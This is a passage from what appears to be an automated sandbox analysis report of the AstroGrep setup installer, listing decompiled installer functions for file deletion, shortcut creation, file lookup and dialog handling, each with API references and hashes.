                                                                                                            • SHGetSpecialFolderLocation.SHELL32(?,0075D8B4), ref: 00405ECC
                                                                                                            • SHGetPathFromIDListA.SHELL32(0075D8B4,Remove folder: ), ref: 00405EDA
                                                                                                            • CoTaskMemFree.OLE32(0075D8B4), ref: 00405EE5
                                                                                                            • lstrcatA.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
                                                                                                            • lstrlenA.KERNEL32(Remove folder: ,?,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000,00404F80,Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\,00000000), ref: 00405F59
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                            • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsq211B.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                            • API String ID: 900638850-4188652698
                                                                                                            • Opcode ID: ffbee074652d6b8252cab1eafdb2ae41c9dfe99060cc35530cbd757453430961
                                                                                                            • Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
                                                                                                            • Opcode Fuzzy Hash: ffbee074652d6b8252cab1eafdb2ae41c9dfe99060cc35530cbd757453430961
                                                                                                            • Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 004055D1, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 159filestringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E004055D1(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E0040588F(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x42e488 =  *0x42e488 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405D2F(0x42a870, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E004057E8(_t73);
					} else {
						lstrcatA(0x42a870, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x409014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]); // executed
						_t40 = FindFirstFileA(0x42a870,  &_v336); // executed
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E004057CC( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00405D2F(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405589(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00404F48(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x42e488 =  *0x42e488 + 1;
										} else {
											E00404F48(0xfffffff1, _t73);
											E00405BEA(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004055D1(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336); // executed
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x42a870 - 0x5c;
					if( *0x42a870 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00406033(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E004057A1(_t73);
							_t40 = E00405589(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E00404F48(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E00404F48(0xfffffff1, _t73);
							return E00405BEA(_t72, _t73, 0);
						}
						L33:
						 *0x42e488 =  *0x42e488 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}



















                                                                                                            0x004055db
                                                                                                            0x004055e0
                                                                                                            0x004055e9
                                                                                                            0x004055ec
                                                                                                            0x004055f4
                                                                                                            0x004055f7
                                                                                                            0x004055fa
                                                                                                            0x00405602
                                                                                                            0x00405604
                                                                                                            0x00405605
                                                                                                            0x00000000
                                                                                                            0x00405605
                                                                                                            0x00405610
                                                                                                            0x00405613
                                                                                                            0x00405613
                                                                                                            0x00405613
                                                                                                            0x00405617
                                                                                                            0x0040562a
                                                                                                            0x00405631
                                                                                                            0x00405636
                                                                                                            0x0040563a
                                                                                                            0x0040564a
                                                                                                            0x0040563c
                                                                                                            0x00405642
                                                                                                            0x00405642
                                                                                                            0x0040564f
                                                                                                            0x00405652
                                                                                                            0x0040565d
                                                                                                            0x00405663
                                                                                                            0x00405668
                                                                                                            0x00405678
                                                                                                            0x0040567a
                                                                                                            0x00405680
                                                                                                            0x00405683
                                                                                                            0x00405686
                                                                                                            0x0040573e
                                                                                                            0x0040573e
                                                                                                            0x00405742
                                                                                                            0x00405744
                                                                                                            0x00405744
                                                                                                            0x00405744
                                                                                                            0x00405744
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040568c
                                                                                                            0x0040568c
                                                                                                            0x00405695
                                                                                                            0x0040569b
                                                                                                            0x004056a0
                                                                                                            0x004056a3
                                                                                                            0x004056a5
                                                                                                            0x004056a9
                                                                                                            0x004056ab
                                                                                                            0x004056ab
                                                                                                            0x004056a9
                                                                                                            0x004056ae
                                                                                                            0x004056b1
                                                                                                            0x004056c4
                                                                                                            0x004056c6
                                                                                                            0x004056cb
                                                                                                            0x004056d2
                                                                                                            0x004056ed
                                                                                                            0x004056f2
                                                                                                            0x004056f4
                                                                                                            0x00405718
                                                                                                            0x004056f6
                                                                                                            0x004056f6
                                                                                                            0x004056f9
                                                                                                            0x0040570d
                                                                                                            0x004056fb
                                                                                                            0x004056fe
                                                                                                            0x00405706
                                                                                                            0x00405706
                                                                                                            0x004056f9
                                                                                                            0x004056d4
                                                                                                            0x004056da
                                                                                                            0x004056dc
                                                                                                            0x004056e2
                                                                                                            0x004056e2
                                                                                                            0x004056dc
                                                                                                            0x00000000
                                                                                                            0x004056d2
                                                                                                            0x004056b3
                                                                                                            0x004056b6
                                                                                                            0x004056b8
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004056ba
                                                                                                            0x004056bc
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004056be
                                                                                                            0x004056c2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0040571d
                                                                                                            0x00405727
                                                                                                            0x0040572d
                                                                                                            0x0040572d
                                                                                                            0x00405738
                                                                                                            0x00000000
                                                                                                            0x00405738
                                                                                                            0x00405654
                                                                                                            0x0040565b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405619
                                                                                                            0x00405619
                                                                                                            0x0040561b
                                                                                                            0x00405748
                                                                                                            0x0040574a
                                                                                                            0x0040574d
                                                                                                            0x0040579e
                                                                                                            0x0040579e
                                                                                                            0x0040579e
                                                                                                            0x0040574f
                                                                                                            0x00405752
                                                                                                            0x0040575d
                                                                                                            0x00405762
                                                                                                            0x00405764
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405767
                                                                                                            0x00405773
                                                                                                            0x00405778
                                                                                                            0x0040577a
                                                                                                            0x00000000
                                                                                                            0x00405795
                                                                                                            0x0040577c
                                                                                                            0x0040577f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405784
                                                                                                            0x00000000
                                                                                                            0x0040578b
                                                                                                            0x00405754
                                                                                                            0x00405754
                                                                                                            0x00000000
                                                                                                            0x00405754
                                                                                                            0x00405621
                                                                                                            0x00405624
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00405624

                                                                                                            APIs
                                                                                                            • DeleteFileA.KERNELBASE(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
                                                                                                            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,\*.*,C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
                                                                                                            • lstrcatA.KERNEL32(?,00409014,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
                                                                                                            • lstrlenA.KERNEL32(?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
                                                                                                            • FindFirstFileA.KERNELBASE(C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,?,00409014,?,C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*,?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
                                                                                                            • FindNextFileA.KERNELBASE(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
                                                                                                            • FindClose.KERNEL32(00000000), ref: 00405738
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                            • String ID: "C:\Users\user\AppData\Local\Temp\ASTROGREP_SETUP_V4.4.7.EXE" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsq211B.tmp\*.*$\*.*
                                                                                                            • API String ID: 2035342205-2356523465
                                                                                                            • Opcode ID: 76f0cf5bfb1f51320b672cd4c332f5cb7a228c538b92ebc2b22e9cd978c5504d
                                                                                                            • Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
                                                                                                            • Opcode Fuzzy Hash: 76f0cf5bfb1f51320b672cd4c332f5cb7a228c538b92ebc2b22e9cd978c5504d
                                                                                                            • Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0040205E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139comCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 74%
                                                                                                            			E0040205E() {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x34) = E00402A3A(0xfffffff0);
				 *(_t111 - 0xc) = E00402A3A(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x4c)) = E00402A3A(2);
				 *((intOrPtr*)(_t111 - 0x40)) = E00402A3A(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x38)) = E00402A3A(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x44) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x3c) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E0040580E( *(_t111 - 0xc)) == 0) {
					E00402A3A(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x407514, _t87, 1, 0x407504, _t59); // executed
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x407524, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Program Files (x86)\\AstroGrep");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x3c));
						_t95 =  *((intOrPtr*)(_t111 - 0x40));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x44));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x4c)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x38)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x34), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                                                                                                            0x00402067
                                                                                                            0x00402071
                                                                                                            0x0040207b
                                                                                                            0x00402085
                                                                                                            0x00402090
                                                                                                            0x00402093
                                                                                                            0x004020ad
                                                                                                            0x004020b0
                                                                                                            0x004020b6
                                                                                                            0x004020b9
                                                                                                            0x004020c3
                                                                                                            0x004020c7
                                                                                                            0x004020c7
                                                                                                            0x004020cc
                                                                                                            0x004020dd
                                                                                                            0x004020e5
                                                                                                            0x004021bb
                                                                                                            0x004021bb
                                                                                                            0x004021c2
                                                                                                            0x004020eb
                                                                                                            0x004020eb
                                                                                                            0x004020fa
                                                                                                            0x004020fe
                                                                                                            0x00402101
                                                                                                            0x00402107
                                                                                                            0x00402115
                                                                                                            0x00402118
                                                                                                            0x0040211a
                                                                                                            0x00402125
                                                                                                            0x00402125
                                                                                                            0x0040212a
                                                                                                            0x0040212c
                                                                                                            0x00402133
                                                                                                            0x00402133
                                                                                                            0x00402136
                                                                                                            0x0040213f
                                                                                                            0x00402142
                                                                                                            0x00402147
                                                                                                            0x00402149
                                                                                                            0x00402153
                                                                                                            0x00402153
                                                                                                            0x00402156
                                                                                                            0x0040215f
                                                                                                            0x00402162
                                                                                                            0x0040216b
                                                                                                            0x00402171
                                                                                                            0x00402178
                                                                                                            0x00402191
                                                                                                            0x00402193
                                                                                                            0x004021a1
                                                                                                            0x004021a1
                                                                                                            0x00402191
                                                                                                            0x004021a4
                                                                                                            0x004021aa
                                                                                                            0x004021aa
                                                                                                            0x004021ad
                                                                                                            0x004021b3
                                                                                                            0x004021b9
                                                                                                            0x004021ce
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x004021b9
                                                                                                            0x004021c4
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • CoCreateInstance.OLE32(00407514,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                                                                            • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407504,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                                                                            Strings
                                                                                                            • C:\Program Files (x86)\AstroGrep, xrefs: 0040211D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharCreateInstanceMultiWide
                                                                                                            • String ID: C:\Program Files (x86)\AstroGrep
                                                                                                            • API String ID: 123533781-2344716657
                                                                                                            • Opcode ID: 2dc2b96a66f57c24b750db45e5506c73cf51cde49f126d2de88fdbea151c2965
                                                                                                            • Instruction ID: 202bff00353f62e800299527826cf24c9a9ce8e01df6a73eade79aa1dd8fb932
                                                                                                            • Opcode Fuzzy Hash: 2dc2b96a66f57c24b750db45e5506c73cf51cde49f126d2de88fdbea151c2965
                                                                                                            • Instruction Fuzzy Hash: 16512775A00208BFCF10DFA4CD88A9DBBB5BF48318F20856AF615EB2D1DA799941CB14
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00406033, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E00406033(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42b0b8); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2); // executed
				return 0x42b0b8;
			}




                                                                                                            0x0040603e
                                                                                                            0x00406047
                                                                                                            0x00000000
                                                                                                            0x00406054
                                                                                                            0x0040604a
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNELBASE(74B5FA90,0042B0B8,C:\,004058D2,C:\,C:\,00000000,C:\,C:\,74B5FA90,?,C:\Users\user\AppData\Local\Temp\,004055F1,?,74B5FA90,C:\Users\user\AppData\Local\Temp\), ref: 0040603E
                                                                                                            • FindClose.KERNELBASE(00000000), ref: 0040604A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                            • String ID: C:\
                                                                                                            • API String ID: 2295610775-3404278061
                                                                                                            • Opcode ID: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                            • Instruction ID: 8bfbb141000912a81af5c8de5ce039a851029b32224eb031c3a4159cf0b452c4
                                                                                                            • Opcode Fuzzy Hash: 1a0439c71b90d7762d613f3ef5096b6a49eabdc5bf1978f8ceae5763bb33e6b2
                                                                                                            • Instruction Fuzzy Hash: 11D0123195D1205BC31167387D0C88B7B599B163317518A33B56AF12F0C7349C6686EE
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00402688, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 41%
                                                                                                            			E00402688(char __ebx, char* __edi, char* __esi) {
				void* _t6;
				void* _t19;

				_t6 = FindFirstFileA(E00402A3A(2), _t19 - 0x1a4); // executed
				if(_t6 != 0xffffffff) {
					E00405C8D(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E00405D2F();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42e488 =  *0x42e488 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}





                                                                                                            0x00402697
                                                                                                            0x004026a0
                                                                                                            0x004026b4
                                                                                                            0x004026bf
                                                                                                            0x004026c0
                                                                                                            0x004027f5
                                                                                                            0x004026a2
                                                                                                            0x004026a2
                                                                                                            0x004026a4
                                                                                                            0x004026a6
                                                                                                            0x004026a6
                                                                                                            0x004028d2
                                                                                                            0x004028de

                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402697
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.263954453.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.263948093.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263960818.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263965905.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263981271.0000000000434000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263991349.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                            • Associated: 00000005.00000002.263995372.000000000044A000.00000002.00020000.sdmp Download File
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID:
                                                                                                            • API String ID: 1974802433-0
                                                                                                            • Opcode ID: bfc32a980be8afd774be7d36f6a04d6cd6616e565dcef0ba011c71aa6fcb6649
                                                                                                            • Instruction ID: 3dffafe4ea1a5cbb8d5ba181f96d08faa62a405c2aca3b81b81ef469795ec413
                                                                                                            • Opcode Fuzzy Hash: bfc32a980be8afd774be7d36f6a04d6cd6616e565dcef0ba011c71aa6fcb6649
                                                                                                            • Instruction Fuzzy Hash: 7AF0A0326081049FE701EBA49949AEEB7789F21324F60057BE241A21C1D7B84985AB3A
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00403A41, Relevance: 59.8, APIs: 32, Strings: 2, Instructions: 345windowstringCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 84%
                                                                                                            			E00403A41(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				void* _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t141;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429850 = _t35;
					if(_t115 == 0x110) {
						 *0x42e408 = _t125;
						 *0x429864 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428830 = _t91;
						E00403F14(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42dbe8); // executed
						 *0x42dbcc = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429850 = 1;
					}
					_t122 = "\t"; // 0x9
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42e420;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403F60(0x40b);
						while(1) {
							_t37 =  *0x429850; // 0x1
							"\t" = "\t" + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 = "\t"; // 0x9
							__eflags = _t39 -  *0x42e424;
							if(_t39 ==  *0x42e424) {
								E0040140B(1);
							}
							__eflags =  *0x42dbcc - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags = "\t" -  *0x42e424; // 0x9
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405D51(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403F14(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403F14(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403F14(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42e48c - _t133;
							_v32 = _t49;
							if( *0x42e48c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008); // executed
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100); // executed
							E00403F36(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428830, _t117); // executed
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42e48c - _t133;
							if( *0x42e48c == _t133) {
								_push( *0x429864);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428830);
							}
							E00403F49();
